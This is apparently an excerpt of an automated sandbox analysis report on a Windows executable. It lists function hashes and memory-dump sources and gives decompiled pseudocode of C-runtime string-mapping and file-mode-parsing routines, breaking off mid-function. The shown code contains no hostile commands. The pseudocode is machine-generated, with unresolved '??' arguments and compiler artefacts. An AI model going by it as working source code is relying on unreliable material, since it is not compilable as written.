                                                                                                                                                                                          • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401650, Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                                          • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402F20, Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                                          • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402F89, Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                                          • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                                          • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417081, Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x4c5fa4f
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                                                                                                          0x00417089
                                                                                                                                                                                          0x00417090
                                                                                                                                                                                          0x00417098
                                                                                                                                                                                          0x0041709a
                                                                                                                                                                                          0x004170a0
                                                                                                                                                                                          0x004170a6
                                                                                                                                                                                          0x004170bb
                                                                                                                                                                                          0x004170c5
                                                                                                                                                                                          0x004170cb
                                                                                                                                                                                          0x004170ce
                                                                                                                                                                                          0x004170d0
                                                                                                                                                                                          0x004170d0
                                                                                                                                                                                          0x004170bd
                                                                                                                                                                                          0x004170bd
                                                                                                                                                                                          0x004170bd
                                                                                                                                                                                          0x004170bb
                                                                                                                                                                                          0x004170dd
                                                                                                                                                                                          0x00417101
                                                                                                                                                                                          0x00417101
                                                                                                                                                                                          0x00417109
                                                                                                                                                                                          0x004172bb
                                                                                                                                                                                          0x004172be
                                                                                                                                                                                          0x004172c1
                                                                                                                                                                                          0x004172c4
                                                                                                                                                                                          0x004172cb
                                                                                                                                                                                          0x004172cb
                                                                                                                                                                                          0x004172ce
                                                                                                                                                                                          0x004172d1
                                                                                                                                                                                          0x004172d8
                                                                                                                                                                                          0x004172d8
                                                                                                                                                                                          0x004172de
                                                                                                                                                                                          0x004172e4
                                                                                                                                                                                          0x004172e7
                                                                                                                                                                                          0x004172ea
                                                                                                                                                                                          0x004172f3
                                                                                                                                                                                          0x004172f6
                                                                                                                                                                                          0x004173ef
                                                                                                                                                                                          0x004173f1
                                                                                                                                                                                          0x004173f1
                                                                                                                                                                                          0x004173f4
                                                                                                                                                                                          0x004173f6
                                                                                                                                                                                          0x004173f9
                                                                                                                                                                                          0x004173fe
                                                                                                                                                                                          0x004173ff
                                                                                                                                                                                          0x00417402
                                                                                                                                                                                          0x00417404
                                                                                                                                                                                          0x00417406
                                                                                                                                                                                          0x00417409
                                                                                                                                                                                          0x0041740b
                                                                                                                                                                                          0x0041740c
                                                                                                                                                                                          0x00417411
                                                                                                                                                                                          0x00417409
                                                                                                                                                                                          0x00417412
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417412
                                                                                                                                                                                          0x00417309
                                                                                                                                                                                          0x0041730e
                                                                                                                                                                                          0x00417311
                                                                                                                                                                                          0x00417314
                                                                                                                                                                                          0x00417316
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041732a
                                                                                                                                                                                          0x0041732c
                                                                                                                                                                                          0x0041732f
                                                                                                                                                                                          0x00417331
                                                                                                                                                                                          0x0041733a
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x0041737b
                                                                                                                                                                                          0x0041737b
                                                                                                                                                                                          0x0041737d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417384
                                                                                                                                                                                          0x0041739c
                                                                                                                                                                                          0x0041739e
                                                                                                                                                                                          0x004173a1
                                                                                                                                                                                          0x004173a3
                                                                                                                                                                                          0x004173bf
                                                                                                                                                                                          0x004173c1
                                                                                                                                                                                          0x004173c9
                                                                                                                                                                                          0x004173cb
                                                                                                                                                                                          0x004173cb
                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                          0x004173cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004173d4
                                                                                                                                                                                          0x0041733c
                                                                                                                                                                                          0x0041733f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417341
                                                                                                                                                                                          0x00417344
                                                                                                                                                                                          0x00417349
                                                                                                                                                                                          0x00417362
                                                                                                                                                                                          0x00417368
                                                                                                                                                                                          0x0041736a
                                                                                                                                                                                          0x0041736c
                                                                                                                                                                                          0x00417372
                                                                                                                                                                                          0x00417372
                                                                                                                                                                                          0x00417372
                                                                                                                                                                                          0x00417375
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417375
                                                                                                                                                                                          0x0041734b
                                                                                                                                                                                          0x00417350
                                                                                                                                                                                          0x00417352
                                                                                                                                                                                          0x00417354
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417356
                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417117
                                                                                                                                                                                          0x0041711a
                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                          0x00417414
                                                                                                                                                                                          0x00417425
                                                                                                                                                                                          0x00417425
                                                                                                                                                                                          0x00417120
                                                                                                                                                                                          0x00417126
                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                          0x00417130
                                                                                                                                                                                          0x00417153
                                                                                                                                                                                          0x00417155
                                                                                                                                                                                          0x00417157
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                          0x004171a5
                                                                                                                                                                                          0x004171a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004171c1
                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                          0x004172b2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004172b5
                                                                                                                                                                                          0x004171c7
                                                                                                                                                                                          0x004171db
                                                                                                                                                                                          0x004171dd
                                                                                                                                                                                          0x004171e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004171ef
                                                                                                                                                                                          0x0041721a
                                                                                                                                                                                          0x0041721c
                                                                                                                                                                                          0x00417263
                                                                                                                                                                                          0x00417263
                                                                                                                                                                                          0x00417263
                                                                                                                                                                                          0x00417265
                                                                                                                                                                                          0x00417265
                                                                                                                                                                                          0x00417267
                                                                                                                                                                                          0x00417277
                                                                                                                                                                                          0x0041727d
                                                                                                                                                                                          0x0041727f
                                                                                                                                                                                          0x00417281
                                                                                                                                                                                          0x00417282
                                                                                                                                                                                          0x00417283
                                                                                                                                                                                          0x00417286
                                                                                                                                                                                          0x0041728c
                                                                                                                                                                                          0x0041728f
                                                                                                                                                                                          0x00417288
                                                                                                                                                                                          0x00417288
                                                                                                                                                                                          0x00417289
                                                                                                                                                                                          0x00417289
                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                          0x004172a4
                                                                                                                                                                                          0x004172a9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417267
                                                                                                                                                                                          0x00417222
                                                                                                                                                                                          0x00417223
                                                                                                                                                                                          0x00417225
                                                                                                                                                                                          0x00417228
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041722a
                                                                                                                                                                                          0x0041722a
                                                                                                                                                                                          0x0041722e
                                                                                                                                                                                          0x00417233
                                                                                                                                                                                          0x0041724c
                                                                                                                                                                                          0x00417252
                                                                                                                                                                                          0x00417254
                                                                                                                                                                                          0x00417256
                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                          0x0041725f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041725f
                                                                                                                                                                                          0x00417235
                                                                                                                                                                                          0x0041723a
                                                                                                                                                                                          0x0041723c
                                                                                                                                                                                          0x0041723e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417240
                                                                                                                                                                                          0x00417246
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417246
                                                                                                                                                                                          0x004171f4
                                                                                                                                                                                          0x00417213
                                                                                                                                                                                          0x00417213
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004171f4
                                                                                                                                                                                          0x00417163
                                                                                                                                                                                          0x00417164
                                                                                                                                                                                          0x00417169
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041716b
                                                                                                                                                                                          0x0041716b
                                                                                                                                                                                          0x00417174
                                                                                                                                                                                          0x0041718a
                                                                                                                                                                                          0x00417190
                                                                                                                                                                                          0x00417192
                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                          0x00417194
                                                                                                                                                                                          0x0041719a
                                                                                                                                                                                          0x0041719a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041719a
                                                                                                                                                                                          0x00417176
                                                                                                                                                                                          0x0041717b
                                                                                                                                                                                          0x0041717f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417181
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417181
                                                                                                                                                                                          0x00417157
                                                                                                                                                                                          0x00417109
                                                                                                                                                                                          0x004170df
                                                                                                                                                                                          0x004170e2
                                                                                                                                                                                          0x004170e5
                                                                                                                                                                                          0x004170e5
                                                                                                                                                                                          0x004170e8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004170ea
                                                                                                                                                                                          0x004170ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004170ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004170ef
                                                                                                                                                                                          0x004170f7
                                                                                                                                                                                          0x004170fb
                                                                                                                                                                                          0x004170fd
                                                                                                                                                                                          0x004170fd
                                                                                                                                                                                          0x004170fe
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,03191888), ref: 004170C5
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                          • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                          • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                          • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                          • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3809854901-0
                                                                                                                                                                                          • Opcode ID: 933ff2d5b42dd3f3d5c005204d55fe4baca965455adffe6b3e253dbb5065971c
                                                                                                                                                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 933ff2d5b42dd3f3d5c005204d55fe4baca965455adffe6b3e253dbb5065971c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004057B0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
